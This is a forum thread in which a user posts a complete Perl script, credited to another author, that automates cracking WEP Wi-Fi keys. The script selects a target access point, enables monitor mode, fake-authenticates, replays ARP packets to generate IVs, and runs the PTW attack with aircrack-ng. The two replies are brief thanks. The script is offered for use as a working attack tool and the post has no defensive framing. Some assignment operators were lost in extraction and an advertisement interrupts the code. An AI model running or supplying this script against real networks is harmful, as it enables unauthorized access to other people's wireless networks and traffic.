Activity Stream
93,440 MEMBERS
27 ONLINE
Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes
Results 1 to 3 of 3
  1.    Tweet this post   Share This Post On Facebook Share This Post On Google+
    #1
    Android Modder
    whateverfor's Avatar

    Cracked Automatically crack a WEP network in minutes

    automatically crack a WEP network in minutes. It displays a list of available WEP networks and once selected, it automatically places your driver in monitor mode, tests packet injection, fake authenticates with the AP, captures IVs for cracking, captures ARP packets and replays them to introduce more IVs into the network, and cracks using the PTW attack

    Source Code : 
    #!/usr/bin/perl

    use strict;

    my $interface shift || "wlan0";

    my $airmon    "airmon-ng";
    my $aireplay    "aireplay-ng";
    my $aircrack    "aircrack-ng";
    my $airodump    "airodump-ng";

    # stop + start interface
    system($airmon"start"$interface);

    print 
    "Please find an AP to use. When found, hit CTRL+C.\n";
    print 
    "[remember part of the name or part of BSSID]\n";

    # tmpfile for ap output
    my $tmpfile "/tmp/airsamy" rand();
    unlink(glob("$tmpfile*"));

    # show user APs
    eval {
        
    local $SIG{INT} = sub { die };
        
    open(DUMP"$airodump --output-format csv -w $tmpfile $interface|") || die "Can't run airodump ($airodump): $!";
    };
    close(DUMP);

    # read in APs
    my %aps;
    my ($tmpfile1) = glob("$tmpfile*");
    open(APS"<$tmpfile1") || die "Can't read tmp file $tmpfile1: $!";
    while (<
    APS>)
    {
        
    chomp;
        
    s/://g;
        
    s/\s+/ /g;
        
    $aps{$_} = 1;
    }
    close(APS);
    unlink($tmpfile1);

    # ask for AP
    my ($input$ap);
    while (!
    $ap)
    {
        
    my $found 0;

        print 
    "\nPlease enter part of the name/bssid of the AP: ";
        
    chomp($input = <STDIN>);
        
    $input =~ s/://g;
        
    print "\n";

        foreach 
    my $tmpap (keys %aps)
        {
            
    my @data split(/\s*,\s+/, $tmpap);
            if (
    $tmpap =~ /$input/i)
            {
                print 
    "Found: $data[0] ($data[13]) ch=$data[3] mb=$data[4] enc=$data[5] $data[6] $data[7]";
                if (
    $data[5] !~ /WEP/)
                {
                    print 
    " -- NOT WEP!";
                }
                else
                {
                    
    $found++;
                    
    $ap $tmpap;
                }
                print 
    "\n";
            }
        }

        if (
    $found 1)
        {
            
    $ap undef;
            print 
    "\nPlease be more specific.\n\n";
        }
    }

    # get ap info
    my @data split(/\s*,\s+/, $ap);
    my ($bssid$essid$chan) = ($data[0], $data[13], $data[3]);

    # start on channel
    system($airmon"start"$interface$chan);

    # test injection
    system($aireplay"-9""-e"$essid"-a"$bssid$interface);

    # fake auth with the AP
    system($aireplay"-1""0""-e"$essid"-a"$bssid$interface);

    # fork off, capture IVs in front
    if (fork())
    {
        
    # capture IVs
        
    system($airodump"-c"$chan"--bssid"$bssid"-w"$tmpfile$interface);

        
    # crack!

    [Login or Register to remove this advertisement]

        #system($aircrack, "-z", glob("$tmpfile*cap"));

        # remove extra files
        
    unlink(glob("$tmpfile*"));
    }

    # do background stuff to produce packets
    else
    {
        
    sleep(1);

        
    # crack until we find something
        
    if (fork())
        {
            
    my ($key);
            while (!
    $key)
            {
                
    open(CRACK"$aircrack -z " join(" "glob("$tmpfile*cap")) . "|");
                while (<
    CRACK>)
                {
                    if (/
    correctly:\s*100%/)
                    {
                        
    $key 1;
                        
    close(CRACK);
                    }
                }
            }

            
    system("killall""-9"$aireplay$airodump);
            
    system($aircrack"-z"glob("$tmpfile*cap"));
        }

        
    # inject arps
        
    else
        {
            
    # capture an ARP and replay
            
    system($aireplay"-3""-b"$bssid$interface);
        }

    FULL CREDITS TO SAMY
    whateverfor Reviewed by whateverfor on . Automatically crack a WEP network in minutes automatically crack a WEP network in minutes. It displays a list of available WEP networks and once selected, it automatically places your driver in monitor mode, tests packet injection, fake authenticates with the AP, captures IVs for cracking, captures ARP packets and replays them to introduce more IVs into the network, and cracks using the PTW attack #!/usr/bin/perl use strict; my $interface = shift || "wlan0"; my $airmon = "airmon-ng"; my $aireplay = "aireplay-ng"; Rating: 5

  2. The Following 2 Users Say Thank You to whateverfor For This Useful Post:
    [ Click to Expand ]

    abidlidcm (22nd January 2014),Bianden19592 (23rd December 2013)

  3.   Advertisements

  4.    Tweet this post   Share This Post On Facebook Share This Post On Google+
    #2
    thx for this code is really useful.

  5.    Tweet this post   Share This Post On Facebook Share This Post On Google+
    #3
    merci bien à vous

    Translated : well thank you to you
    Last edited by G u H a N; 22nd January 2014 at 09:50 AM. Reason: pls use english

Thread Information

Users Browsing this Thread

There Are Currently 1 Users Browsing This Thread. (0 Members and 1 Guests)

Tags for this Thread

BE SOCIAL
Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes Automatically crack a WEP network in minutes